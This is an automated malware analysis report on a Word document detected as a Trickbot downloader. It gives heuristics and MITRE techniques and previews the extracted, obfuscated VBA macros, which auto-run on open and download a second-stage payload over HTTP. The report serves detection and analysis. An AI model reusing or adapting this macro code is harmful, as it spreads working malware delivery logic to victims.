Verdict: MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with a signature indicating Trickbot. The presence of VBA macros, specifically an AutoOpen macro and CreateObject calls, strongly suggests malicious intent. The script attempts to download a second-stage payload by making HTTP requests to URLs constructed from obfuscated strings, which is a common Trickbot behavior.
Heuristics (8)

- ClamAV: Doc.Downloader.Trickbot-6444938-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Trickbot-6444938-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10920 bytes | 0f12976257708a2ed19d0fa6ad0bfd3076c48bcfa1302b20faa5a975ec0022f0 |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
t2201953
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
End Sub
Attribute VB_Name = "aliciamp3"
Function polojester()
polojester = "9E58|E697E5''Rhl5|Eunu"
End Function
Function llehangn()
llehangn = veotsirH.nekukufu
End Function
Function racing1965()
Set naryejec = CreateObject(UserForm1.TextBox3)
naryejec.Open UserForm1.TextBox2, abctrident(dylan2001), False
naryejec.send
If naryejec.Status <> 200 Then
naryejec.Open UserForm1.TextBox2, abctrident(goblue01), False
naryejec.send
Else
End If
daxdizpa naryejec
September1667
End Function
Attribute VB_Name = "AVODOROBELH"
Attribute VB_Base = "0{0A3FCBC7-A2A5-474F-A060-56F30A6DA1D4}{0111BA67-243D-4682-85BE-FF9E394FEFD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub
Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub
Private Sub jupiter500_Change()
Set torontolee = CreateObject(deedflut)
esreeves = 97 * 10
esreeves = 74 * 9
esreeves = 81 + 10
esreeves = 67 + 13
esreeves = 40 + 18 + 7
esreeves = 59 - 100 - 8
wade1673 torontolee
End Sub
Private Sub Label1_Click()
MsgBox "Ok"
End Sub
Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub
Attribute VB_Name = "AVOHITLOB"
Attribute VB_Base = "0{6A9586A8-94BA-4473-ADB7-5E30387A65BA}{2557F000-7316-4D63-A3AA-25A41BB94DB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "broiddor"
Function heagrace()
heagrace = AVODOROBELH.Search11
End Function
Sub t2201953()
Randomize
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
veotsirH.zebrastart = "tetteris"
End Sub
Attribute VB_Name = "elsieroger"
Function abctrident(vokrabuhC)
wreckkha = ""
jokerhack = Len(vokrabuhC)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
For billfool = 1 To jokerhack
wreckkha = wreckkha + punkin198(sleekrel(vokrabuhC, billfool), 4)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
Next billfool
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
abctrident = wreckkha
End Function
Function deedflut()
deedflut = sunlibrary
End Function
Function sunlibrary()
sunlibrary = abctrident(ukayobkas.shoorbaa)
End Function
Attribute VB_Name = "evathrac"
Function open0318(ncccrapp, hootiebasf)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
open0318 = abctrident(AVODOROBELH.stalshaf) + ncccrapp + abctrident(AVOHITLOB.abcd2345) + _
hootiebasf + abctrident(AVODOROBELH.musicjoe + AVODOROBELH.blackberry) + hootiebasf
End Function
Attribute VB_Name = "fionachip"
Function christyaaa(pantyman)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
ch
... (truncated)
```